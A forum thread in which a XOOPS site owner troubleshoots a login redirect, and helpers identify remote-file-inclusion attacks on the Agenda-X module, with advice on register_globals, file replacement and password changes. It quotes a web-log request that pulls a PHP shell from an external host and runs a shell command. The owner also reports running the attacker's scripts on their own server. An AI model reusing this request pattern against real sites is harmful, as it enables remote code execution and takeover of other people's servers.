Today something happened om my page I don't understand. Every user that logs in from the login block(The user.php login works fine) is redirected to the same page: modules/agendax/index.php?op=day&ask=nd&da=8&mo=9&ye=2004&next=152&prev=150

How is this possible? I don't understand what happened. Any tips on how to solve the problem?

Please help

check in XOOPS Admin..

System/preferences/General settings and change the start page, it looks like Agenda-X is setup as your start page..

Thaks, but no this is not the problem.

My start page is set to None. And even if it would be agendax the user should be redirected to where he logged in after login.

This problem is very strange. It started to work again like it should for a couple of hours yesterday but now it redirects to agendax again just to a different date than before?!?!?

I looked over all the files that are called from the login block but could not find any hardcoded links or queries to the database that could cause this problem. Infact the login redirects to the page it was called from via the PHP_SELF variable. I really don't understand where it finds the link to agendax(and a special date on top).

Please help me I am desperate.

Some things for you to check:

Make sure that you are running with the PHP option: Register_Globals = Off. Agendax is vulnerable to attack with globals on (this is for the older versions but I'm not convinced about the newer).

Check your web logs for access to addevent.inc.php. I'll bet you'll find a number of attempts. If you've had attempts and globals on I'd suggest overwriting some of the XOOPS files with fresh copies (same versions).

And it wouldn't hurt to System/Modules/Update the agendax and system modules.

Oh, no.

I have a great number of attempts like this in my log:

GET /modules/agendax/addevent.inc.php?agendax_path=http://teranova.fr/2003/lila.jpg?&cmd=cd%20/var/tmp;uname%20-a HTTP/1.1" 200 165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Can you please tell me exactly which files I should replace. I have modified many of the files and I don't want to do it again.

And yes my register_globals is on but I can't help that because I am on shared hosting. Or can it be done with a .httaccess file?

Can they do anything bad on the page through agenda? I really need it. I have the 1.2 version and I have replaced some files when I read something about the voulnerability of agenda in the forums.

Thank you for your help.

I have found some of your other posts so I have placed the .htaccess file you suggested.
Do you think they got in?

Should I change passwords for everything while everything is stil ok?...The only thing wrong is the login redirect.

http://teranova.fr/2003/lila.jpg

it is some kind of script for php-shell acces script.
Will my provider know it security has held?

Double check that globals is indeed off with the .htaccess file. ( php_value register_globals 0 ). if you have a module that won't run with globals off and you feel it is safe you can place another .htaccess file in that directory and do (php_value register_globals 1 ) .htaccess options take effect from that directory and deeper. You can set options where you need them.

As you can see the bandit (terrorist) tried to use addevent.inc.php to deface your site. They use it to call an external file and have it run on your server. You might be lucky that they didn't trash the whole site.

Yes, changing passwords is wise. Also wise to replace as many XOOPS and agendax files with fresh copies as you can. For files that you've modified you can inspect them or replace and do the changes again. You don't know what they have changed now.

xoops itself is pretty safe against PHP and SQL injection. 3rd party apps *might* not be safe. Having globals off and dealing with the side effects is preferred over getting cracked.

Thank you!

I have analized my logs and there were only 6 attempts alltogether from 2 different ip-s. They were all made on different dates and there were never two sequential.
So I'm guessing they didn't come in? Or did they allways get what they wanted on their first try with this command: cmd=cd%20/var/tmp;uname%20-a ???

I also contacted my provider and they will look over the server logs and will hopefully be able to tell me if they came in.

So your advice is to put a .htaccess file in my root with php_value register_globals 0 in it. And then only put htaccess files(with php_value register_globals 0) to the few module directorys that require globals to be on?

I am changing my passes right now while everything is still working.

I already replaced all the agenda files.I will be raplacing more files if I find out they did anything.

I still have the problem with the redirect after login. the variable $xoops_requesturi is defined in the header.php file like this:
$xoopsTpl->assign('xoops_requesturi', htmlspecialchars($GLOBALS['xoopsRequestUri'], ENT_QUOTES));

xoopsRequestUri is defined in includes/common.php like this:
$xoopsRequestUri = @xoops_getenv('REQUEST_URI');

I don't understand where the value modules/agendax/index.php?op=view&id=79 comes in?

Thanks for your help you are really helping me here. In oter words: I would be totaly lost without your tips.

I did one more thing: I uploaded the exploit scripts they used to my server and I tryed to run them with the same comands they used and I only got info about the server and this:

User Info: uid(99) euid(99) gid(99)

I don't think this helps them much?